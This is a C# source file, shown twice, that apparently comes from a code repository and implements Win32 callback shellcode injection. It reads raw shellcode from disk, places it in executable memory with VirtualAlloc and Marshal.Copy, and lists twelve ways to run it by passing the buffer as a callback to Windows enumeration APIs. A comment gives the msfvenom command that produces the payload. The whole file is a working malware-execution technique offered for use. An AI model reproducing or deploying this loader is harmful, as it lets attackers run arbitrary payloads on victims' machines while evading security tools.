v4nyl/Win32_Callback_Inject.cs

## Win32_Callback_Inject.cs
using System;
using System.IO;
using System.Runtime.InteropServices;

//Resource: https[:]//vx-underground.org/papers.html -> Windows VX -> INJECTION -> Win32 Callback Injection (Author(s): Dreamer && Clover)

namespace Callback_Inject
{
    class Program
    {
        public static void Main(string[] args)
        {

            byte[] shellcode = File.ReadAllBytes(@"C:\path\to\shellcode.txt"); // msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -f raw -o shellcode.txt
            IntPtr hAlloc = VirtualAlloc(IntPtr.Zero, (uint)shellcode.Length, 0x1000 | 0x2000, 0x40);
            Marshal.Copy(shellcode,0,hAlloc,shellcode.Length);

            //Method 1
            //EnumChildWindows(IntPtr.Zero, hAlloc, IntPtr.Zero);

            //Method 2
            //EnumWindows(hAlloc, IntPtr.Zero);

            //Method 3
            //EnumDateFormatsEx(hAlloc, 0x0800, 0);

            //Method 4
            //EnumDesktops(GetProcessWindowStation(), hAlloc, IntPtr.Zero);

            //Method 5
            //EnumDesktopWindows(GetThreadDesktop(GetCurrentThreadId()), hAlloc, IntPtr.Zero);

            //Method 6
            //EnumSystemCodePagesA(hAlloc, 0);

            //Method 7
            //EnumSystemCodePagesW(hAlloc, 0);

            //Method 8
            //int GEOCLASS_NATION = 0x10;
            //EnumSystemGeoID(GEOCLASS_NATION, 0, hAlloc);

            //Method 9
            //Int32 LGRPID_SUPPORTED = 0x00000002;
            //EnumSystemLanguageGroupsA(hAlloc, LGRPID_SUPPORTED, IntPtr.Zero);

            //Method 10
            //EnumSystemLocalesA(hAlloc,0);

            //Method 11
            //EnumThreadWindows(0,hAlloc,IntPtr.Zero);

            //Method 12
            //EnumUILanguages(hAlloc, 0, IntPtr.Zero);
        }

        [DllImport("kernel32")]
        public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

        //Method 1
        [DllImport("user32.dll")]
        [return: MarshalAs(UnmanagedType.Bool)]
        public static extern bool EnumChildWindows(IntPtr window, IntPtr callback, IntPtr i);

        //Method 2
        [DllImport("user32.dll")]
        [return: MarshalAs(UnmanagedType.Bool)]
        static extern bool EnumWindows(IntPtr lpEnumFunc, IntPtr lParam);

        //Method 3
        [DllImport("kernel32.dll")]
        static extern bool EnumDateFormatsEx(IntPtr lpDateFmtEnumProcEx,uint Locale, uint dwFlags);

        //Method 4
        [DllImport("user32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
        public static extern IntPtr GetProcessWindowStation();
        [DllImport("user32.dll")]
        static extern bool EnumDesktops(IntPtr hwinsta, IntPtr lpEnumFunc, IntPtr lParam);

        //Method 5
        [DllImport("user32.dll")]
        static extern bool EnumDesktopWindows(IntPtr hDesktop, IntPtr lpfn, IntPtr lParam);

        [DllImport("user32.dll", SetLastError = true)]
        static extern IntPtr GetThreadDesktop(uint dwThreadId);

        [DllImport("kernel32.dll")]
        static extern uint GetCurrentThreadId();

        //Method 6
        [DllImport("kernel32.dll")]
        static extern bool EnumSystemCodePagesA(IntPtr lpCodePageEnumProc, uint dwFlags);

        //Method 7
        [DllImport("kernel32.dll")]
        static extern bool EnumSystemCodePagesW(IntPtr lpCodePageEnumProc, uint dwFlags);

        //Method 8
        [DllImport("kernel32.dll")]
        public static extern bool EnumSystemGeoID(int geoClass, int parentGeoId, IntPtr callback);

        //Method 9
        [DllImport("kernel32.dll")]
        public static extern bool EnumSystemLanguageGroupsA(IntPtr lpLanguageGroupEnumProc, int dwFlags, IntPtr lParam);

        //Method 10
        [DllImport("kernel32.dll")]
        public static extern bool EnumSystemLocalesA(IntPtr lpLocaleEnumProc, uint dwFlags);

        //Method 11
        [DllImport("user32.dll")]
        [return: MarshalAs(UnmanagedType.Bool)]
        static extern bool EnumThreadWindows(uint dwThreadId, IntPtr lpfn, IntPtr lParam);

        //Method 12
        [DllImport("Kernel32.dll", CharSet = CharSet.Auto)]
        static extern bool EnumUILanguages(IntPtr lpUILanguageEnumProc, UInt32 dwFlags, IntPtr lParam);
    }
}
	using System;
	using System.IO;
	using System.Runtime.InteropServices;

	//Resource: https[:]//vx-underground.org/papers.html -> Windows VX -> INJECTION -> Win32 Callback Injection (Author(s): Dreamer && Clover)

	namespace Callback_Inject
	{
	class Program
	{
	public static void Main(string[] args)
	{

	byte[] shellcode = File.ReadAllBytes(@"C:\path\to\shellcode.txt"); // msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -f raw -o shellcode.txt
	IntPtr hAlloc = VirtualAlloc(IntPtr.Zero, (uint)shellcode.Length, 0x1000 \| 0x2000, 0x40);
	Marshal.Copy(shellcode,0,hAlloc,shellcode.Length);

	//Method 1
	//EnumChildWindows(IntPtr.Zero, hAlloc, IntPtr.Zero);

	//Method 2
	//EnumWindows(hAlloc, IntPtr.Zero);

	//Method 3
	//EnumDateFormatsEx(hAlloc, 0x0800, 0);

	//Method 4
	//EnumDesktops(GetProcessWindowStation(), hAlloc, IntPtr.Zero);

	//Method 5
	//EnumDesktopWindows(GetThreadDesktop(GetCurrentThreadId()), hAlloc, IntPtr.Zero);

	//Method 6
	//EnumSystemCodePagesA(hAlloc, 0);

	//Method 7
	//EnumSystemCodePagesW(hAlloc, 0);

	//Method 8
	//int GEOCLASS_NATION = 0x10;
	//EnumSystemGeoID(GEOCLASS_NATION, 0, hAlloc);

	//Method 9
	//Int32 LGRPID_SUPPORTED = 0x00000002;
	//EnumSystemLanguageGroupsA(hAlloc, LGRPID_SUPPORTED, IntPtr.Zero);

	//Method 10
	//EnumSystemLocalesA(hAlloc,0);

	//Method 11
	//EnumThreadWindows(0,hAlloc,IntPtr.Zero);

	//Method 12
	//EnumUILanguages(hAlloc, 0, IntPtr.Zero);
	}

	[DllImport("kernel32")]
	public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

	//Method 1
	[DllImport("user32.dll")]
	[return: MarshalAs(UnmanagedType.Bool)]
	public static extern bool EnumChildWindows(IntPtr window, IntPtr callback, IntPtr i);

	//Method 2
	[DllImport("user32.dll")]
	[return: MarshalAs(UnmanagedType.Bool)]
	static extern bool EnumWindows(IntPtr lpEnumFunc, IntPtr lParam);

	//Method 3
	[DllImport("kernel32.dll")]
	static extern bool EnumDateFormatsEx(IntPtr lpDateFmtEnumProcEx,uint Locale, uint dwFlags);

	//Method 4
	[DllImport("user32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
	public static extern IntPtr GetProcessWindowStation();
	[DllImport("user32.dll")]
	static extern bool EnumDesktops(IntPtr hwinsta, IntPtr lpEnumFunc, IntPtr lParam);

	//Method 5
	[DllImport("user32.dll")]
	static extern bool EnumDesktopWindows(IntPtr hDesktop, IntPtr lpfn, IntPtr lParam);

	[DllImport("user32.dll", SetLastError = true)]
	static extern IntPtr GetThreadDesktop(uint dwThreadId);

	[DllImport("kernel32.dll")]
	static extern uint GetCurrentThreadId();

	//Method 6
	[DllImport("kernel32.dll")]
	static extern bool EnumSystemCodePagesA(IntPtr lpCodePageEnumProc, uint dwFlags);

	//Method 7
	[DllImport("kernel32.dll")]
	static extern bool EnumSystemCodePagesW(IntPtr lpCodePageEnumProc, uint dwFlags);

	//Method 8
	[DllImport("kernel32.dll")]
	public static extern bool EnumSystemGeoID(int geoClass, int parentGeoId, IntPtr callback);

	//Method 9
	[DllImport("kernel32.dll")]
	public static extern bool EnumSystemLanguageGroupsA(IntPtr lpLanguageGroupEnumProc, int dwFlags, IntPtr lParam);

	//Method 10
	[DllImport("kernel32.dll")]
	public static extern bool EnumSystemLocalesA(IntPtr lpLocaleEnumProc, uint dwFlags);

	//Method 11
	[DllImport("user32.dll")]
	[return: MarshalAs(UnmanagedType.Bool)]
	static extern bool EnumThreadWindows(uint dwThreadId, IntPtr lpfn, IntPtr lParam);

	//Method 12
	[DllImport("Kernel32.dll", CharSet = CharSet.Auto)]
	static extern bool EnumUILanguages(IntPtr lpUILanguageEnumProc, UInt32 dwFlags, IntPtr lParam);
	}
	}